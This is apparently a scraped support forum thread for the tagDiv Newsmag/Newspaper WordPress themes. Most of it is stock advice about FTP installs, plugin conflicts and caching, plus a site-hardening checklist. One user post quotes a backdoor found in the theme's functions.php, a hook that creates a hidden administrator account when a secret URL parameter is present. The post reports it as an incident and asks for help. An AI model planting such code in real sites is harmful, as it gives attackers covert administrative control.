No search results were found in Documentation!
Hello RaymondB,
Thank you for your interest in our theme! Please keep in mind that each block should have the excerpts and date of the posts. Try to check the theme panel settings, from here -> http://screencast.com/t/0xoF87EmEvS So, if you do not have the latest version of theme, you should update it via FTP because this is the surest and safe method in this regard. Before each update, you should make a full backup to your data to be safe and then, you simply install the new theme on your site, via FTP, according to our documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/
Hope this help and let us know how it goes!
Thanks for the message!
Hello,
Before each migration theme, you should make a full backup to your database to save all your data. Then, you should install the theme to your domain via FTP, because this is the surest method in this regard, according to our documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/ and then you should load your backup there and adjust it to this theme.
Hope this helps!
Thanks for the message!
Hello ollabs78,
Try to make a new clean install from scratch via FTP because this is the surest method in this regard, according to our documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/ -> https://forum.tagdiv.com/newsmag-how-to-update-visual-composer-plugin/
Hope this helps!
Thanks for the message!
Hello Pari,
Please keep in mind that our latest reliable version of the theme is Newsmag 3.2 which is fully tested and compatible with the latest version of WordPress. You should update the theme to this version if you want to bring best results to your website. Before theme updating, you should make a full backup of a database to be safe. This update should have to be done via FTP because this is the surest method in this regard, according to our documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/
Thanks for your understanding!
Hello RaresI,
Please try to make a new clean install from scratch with the latest version of the theme and install only the plugins that come bundled with the theme packet and rule out any conflicting plugins. Please notice that this issue has been resolved, and it should work fine. First of all, please make a full backup to your database to be safe. Also, please ensure that you have updated your theme via FTP because this is the surest method in this regard.
Hope this helps and let us know how it goes!
Thanks for the message!
Hello shreebhat,
Now, your author page seems to work as accurately, as you can see here -> http://screencast.com/t/e4GfDzyVULf If the problem will reappear, please try to make a new clean install from scratch via FTP because the theme is fully tested and compatible with apache.
Thanks for the message!
Hello chrismorda,
I have inspected your website and I saw that your footer section is empty to the mobile theme. Also, I noticed that you are using some untested plugins which can interact with the theme core files and cause a lot of unknown issues. Please try to disable all of them and install only the plugins that come bundled with the theme packet and rule out any conflicting plugins. The default theme should look like this -> http://screencast.com/t/v5HgAvbb on the mobile version. Also, try to update your theme to the latest version of it via FTP method. Also, if the problem is still there, please send us an email at contact@tagdiv.com with your log-in information (wp-admin) so we can further inspect it closer your setup page. Provide there the link of this topic so we can easily identify you.
Thanks for the message!
Yes I have read your post. I have just spent the last 2 hours trying everything you have mentioned. When I added the above code to functions.php the site quit working and I had to install the original functions.php to fix it. I have also read all documentation on CloudFlare.
The only query option CloudFlare has is this >

According to Cloudflare to remove everything starting with the ? you should use the Ignore Query String setting, I am currently using this setting and the problem is still there, for posterity I have tried every setting and it still doesn’t fix the issue.

Your above code reads
if( strpos( $src, '?ver=' ) )
but as you see here most of my problems are query strings that are ?resize= and ?oh= and ?ig_cache_key=

so should your code be modified to something like this?
function remove_cssjs_ver( $src ) {
if( strpos( $src, '?ver= ?resize= ?oh= ?ig_cache_key=' ) )
$src = remove_query_arg( 'ver', $src );
return $src;
}
add_filter( 'style_loader_src', 'remove_cssjs_ver', 10, 2 );
add_filter( 'script_loader_src', 'remove_cssjs_ver', 10, 2 );
or maybe something like this so all urls with a ? in it gets fixed?
function remove_cssjs_ver( $src ) {
if( strpos( $src, '?*' ) )
$src = remove_query_arg( 'ver', $src );
return $src;
}
add_filter( 'style_loader_src', 'remove_cssjs_ver', 10, 2 );
add_filter( 'script_loader_src', 'remove_cssjs_ver', 10, 2 );
If you would be willing to message me, I can give you admin access to my cpanel, ftp, cloudflare and website and once you fix it I will send you 85 dollars to your paypal account, please help me.
-
This reply was modified 9 years by
alexpoucher.
-
This reply was modified 9 years by
alexpoucher.
Hello Mohammedmajed,
I have inspected your website on mobile mode and the theme seems to work as properly. Also, I have noticed that you are using some untested plugins with the theme which can interact with the theme core files and cause a lot of unknown issues. Try to disable all of them and install only the plugins that come bundled with the theme packet and rule out any conflicting plugins. If the problem is still there, try to make a new clean install via FTP, purge all CDN files and check again. Also, if you will have any others issues, please provide some useful screenshots so I can identify the problem.
Thanks for the message!
Hello Shawn,
I have inspected your website, and I saw that in mobile mode, the featured images are not properly working. Also, I have notice that you have some errors through your console, like this -> http://screencast.com/t/U06gMgntKO1 and also, you are using some untested plugins. Please try to disable all of them, leave just Visual Composer to active, clear all your caches and install only the plugins that come bundled with the theme packet and rule out any conflicting plugins. Also, if the problem is still there, please try to make a full backup to your data and make a new clean install from scratch via FTP and check the results. -> https://forum.tagdiv.com/install-via-ftp/
Hope this helps and let us know how it goes!
Thanks for the message!
Hello ollabs78,
The visual composer activation message appears on all sites that use visual composer, not matter the theme or domain. In our case, you must ignore this message as the Visual Composer does not require activation when it’s provided in the theme package. The plugin authors cannot verify this though so they could not remove the message to this particular case. Please read this guide: https://forum.tagdiv.com/how-to-update-visual-composer-plugin/
All the theme installing should have to be done via FTP because this is the surest and safe method in this regard. For more information about this, please consult here -> https://forum.tagdiv.com/install-via-ftp/
Thank you for your understanding!
Hello hkubilayonal,
Please make sure that you are using the latest version of the theme and also, the latest version of Visual Composer which comes bundled with the packet and which is Visual Composer 4.12.1. Also, try to check your system status to be higher increased according to our documentation here -> https://forum.tagdiv.com/system-status-parameters-guide/ Try to increase the PHP memory because this can be exhausted. The theme installations should have to be done via FTP because this is the surest method in this regard. Check the documentation here -> https://forum.tagdiv.com/install-via-ftp/
Hope this helps and let us know how it goes!
Thanks for the message!
Hello milkcrat,
The visual composer activation message appears on all sites that use visual composer, not matter the theme or domain. In our case, you must ignore this message as the Visual Composer does not require activation when it’s provided in the theme package. The plugin authors cannot verify this though so they could not remove the message to this particular case. Please read this guide: https://forum.tagdiv.com/how-to-update-visual-composer-plugin/
All the theme installing should have to be done via FTP because this is the surest and safe method in this regard. For more information about this, please consult here -> https://forum.tagdiv.com/install-via-ftp/
Thank you for your understanding!
Hello ollabs78,
Please make sure if you have downloaded the latest version of the theme and install it via FTP method because this is the surest method in this regard. Please follow the steps which are presented in our documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/ -> https://forum.tagdiv.com/newsmag-how-to-update-the-theme/
Keep in mind that the Visual Composer come bundled with the theme packet and this plugin is fully tested with the theme and until now, we do not have any bad reports regarding on its functionality with the theme.
Thanks for your understanding!
Hello itduck2020,
For more information about our recommended way to update your theme, please consult the documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/
Thanks for your understanding!
@Edragon
I think you got seriously lost someplace.
When you go to ThemeForest, on the downloads page, you can choose multiple options including “all files and theme” or just “the theme.”
As stated, you need to download the main “all files” zip and then unzip that on you hard drive.
In there is a folder called plugins, which clearly contains
1) revolution_slider_5
2) js_composer.zip
3) td-mobile-plugin.zip
4) td-social-booster.zip
5) td-speed-booster.zip
I assure you it is there as thousands of other people here can attest.
You don’t need to ‘update’ the Visual Composer plugin just because an update is available; as it might not be tested to work properly with theme. So VC is only updated when the entire theme package is updated, unless you buy your own VC license separately. So once you install the version included with theme, you don’t need to ‘activate’ it with WP Bakery; but I’m guessing that is not your issue if you didn’t even locate the plugins folder.
## here is the readme from the td-mobile-plugin, once you unzip that folder:
Welcome to the TagDiv Mobile Theme plugin
TagDiv Mobile Theme plugin extends our themes to offer you a better experience on mobile devices. We are in a continue research
in our work, doing our best for fitting your needs, and because the mobile environment is growing up quickly,
and also your expectations, we come to you with a mobile theme that has been tested to load fast using only the necessary components.
The mobile templates files are in the ./mobile theme directory, the TagDiv Mobile Theme plugin detecting and working with them.
From the Mobile Theme section of our well known theme panel, all important mobile theme settings can be set.
Without activating the TagDiv Mobile Theme plugin, the responsive version of our theme is used on mobile devices.
###
ALSO, from the theme docs here for install via FTP, it does tell you to download the -tf version of the zip (all files):
Install via FTP
You can install the theme in two ways: through WordPress or via FTP.
The Newspaper WordPress Theme installable file is Newspaper.zip. Please see the following sections for each method and watch our video tutorial on how to install the Newspaper Theme.
Download the Newspaper files from your ThemeForest account. Navigate to your Downloads tab on ThemeForest and find Newspaper. Click the Download button.
On your local computer extract the ZIP folder called Newspaper-tf. After extracting files you will open the folder called Newspaper-tf where you will find more folders (child-theme, documentation, licensing, plugins, psd).
Locate the Newspaper.zip in the Newspaper-tf folder (this is the theme you want to install).
##
good luck and welcome to the giant Newspaper family of users here — I’ve been lurking here since end of 2013 ! 🙂
1) make sure you’re using legal version of theme
2) do clean install of all wordpress folders via FTP, and clean installs of ALL plugins
3) delete old theme or plugin folders no longer used; they can still be exploited
4) make sure you’re running latest version of WordPress
5) scan site with securi scanner (free)
6) use plugins like “limit login attempts” to block IPs trying to guess passwords
7) disable all XMLRPC ability
8) make sure you’re using https for your site with forced SSL login
9) make sure you disable file editing ability for user levels in wp-config.php; disable automatic updates
10) reset all passwords for users, and ensure your superuser isn’t named “admin”
11) consider disabling all password reset functions
Make sure you do these steps
https://codex.wordpress.org/Hardening_WordPress
Please unpack the theme to a folder after you download NewsPaper from ThemeForest. You will find a folder called “code”.
Inside that folder you will find another folder, called “Newspaper-child”. Upload that via FTP or from CPanel to your theme folder. Then go to Themes in WordPress and activate your desired child theme.
Hi,
I just want to confirm these below before I proceed.
1) I need to delete current newspaper theme (using delete option in WP) then install it again using FTP.
2) Delete/Deactivate any plugins that does not come with newspapers theme
3) I only see .htaccess but not .hthaccess. Are they different files?
4) If it is .htaccess, should I insert these code at the end, after line </IfModule>, before line # END WordPress
https://drive.google.com/open?id=0B09ARADyxMFOX0ZuT0pvamJMOUk
5) How do I know if I have SUHOSIN installed? Please look at attachment, does this mean I have SUHOSIN installed and it should be fixed in php.ini?
https://drive.google.com/open?id=0B09ARADyxMFOZUVSRWVRT3dNVkU
Thank you!
See the docs on how to update.
You can update via WP theme panel after you download the theme zip from themeforest.
Best way is via FTP to ensure it always works; and so you can make site backup at same time.
a) disable all plugins except VC
b) install theme and plugins via FTP
c) clear caching if used
d) clear transients with wp-optimize
e) resave permalinks
f) make sure you have at least 256M allocated to WP in your wp-config.php file and php.ini on hosting, for busy site can be higher depending on your hosting plan; 96M minimum needed for VC *default is 40M // you can check this on the system status panel in theme settings
g) note you need to then actually setup your site using a custom home page; then select that ‘page’ as the homepage in WP settings > set static page
h) you will need to regenerate thumbs to fit pages
i) you need to go through the theme panel settings and set defaults for page/category templates, post templates
** note any custom CPTs, plugins, shortcodes from former theme likely don’t work in the new theme as ‘shortcodes’ are styles included with theme not WordPress so don’t carry over, etc.
If site not working while you learn how it works, setup dev folder and import site, then test there prior to deploy.
If you can’t get anything to work; roll your site back to former theme/plugins, and resurrect your dbase from the last backup.
All common sense stuff. Good luck!
Hi!
My team and I would like to know if the TagDiv team is aware of or has already registered an occurrence of WP intrusion and malicious script insertion through the Newsmag theme.
And besides, we need help to solve this problem, because it occurred to us.
We detected in our WP blog a malicious script that executed the creation of a new user access level “administrator”.
Add_action ('wp_head', 'my_back');
Function my_back () {
If ($ _GET ['back'] == '2b4f6tx4') {
Require ('wp-includes / registration.php');
If (! Username_exists ('mr_admin')) {
$ User_id = wp_create_user ('guest', '2b4f6tx4');
$ User = new WP_User ($ user_id);
$ User-> set_role ('administrator');
}
}
}
This code has been inserted in wp-content/themes/Newsmag/functions.php.
There is no possibility of access not allowed via FTP. We already checked.
We found some mentions on the internet about this type of invasion using WordPress themes.
We have already removed the created user and are viewing the WP and theme files one by one to see if we find any more malicious scripts.
But we need help to block this kind of activity and avoid future problems.
Thank you very much!
Hello votranhtuhi,
Please try to make a new clean install from scratch via FTP method and install only the plugins that come bundled with the theme packet and rule out any conflicting plugins. Notice that the WordPress is fully tested with the theme and until now we have not encountered any issues in this regard. Try my advice according to our documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/ Also, please check your system status to be increased according to our documentation here -> https://forum.tagdiv.com/system-status-parameters-guide/ Check your PHP memory and increase theme because it may be exhausted.
Also, please notice that our theme has not been tested with WPEdit and we cannot say for sure if it will work or not with our product, sorry! Also, we cannot provide support for untested plugins.
Hope this helps and let us know how it goes!
Thanks for the message!
Hello awesomenezz,
Please try to make a new clean install from scratch via FTP method and install only the plugins that come bundled with the theme packet and rule out any conflicting plugins. Notice that the WordPress is fully tested with the theme and until now we have not encountered any issues in this regard. Try my advice according to our documentation here -> https://forum.tagdiv.com/newsmag-install-via-ftp/ Also, please check your system status to be increased according to our documentation here -> https://forum.tagdiv.com/system-status-parameters-guide/ Check your PHP memory and increase theme because it may be exhausted.
Thanks for the message!
Hello, Yes the problem is still there .as i have said i ghave installed the theme via ftp, disabled childtheme and all plugins.. still the same.. even tried csutom css align text but it did not work either.. where i can send the screen shots? you want me to send you screen shot of centered text?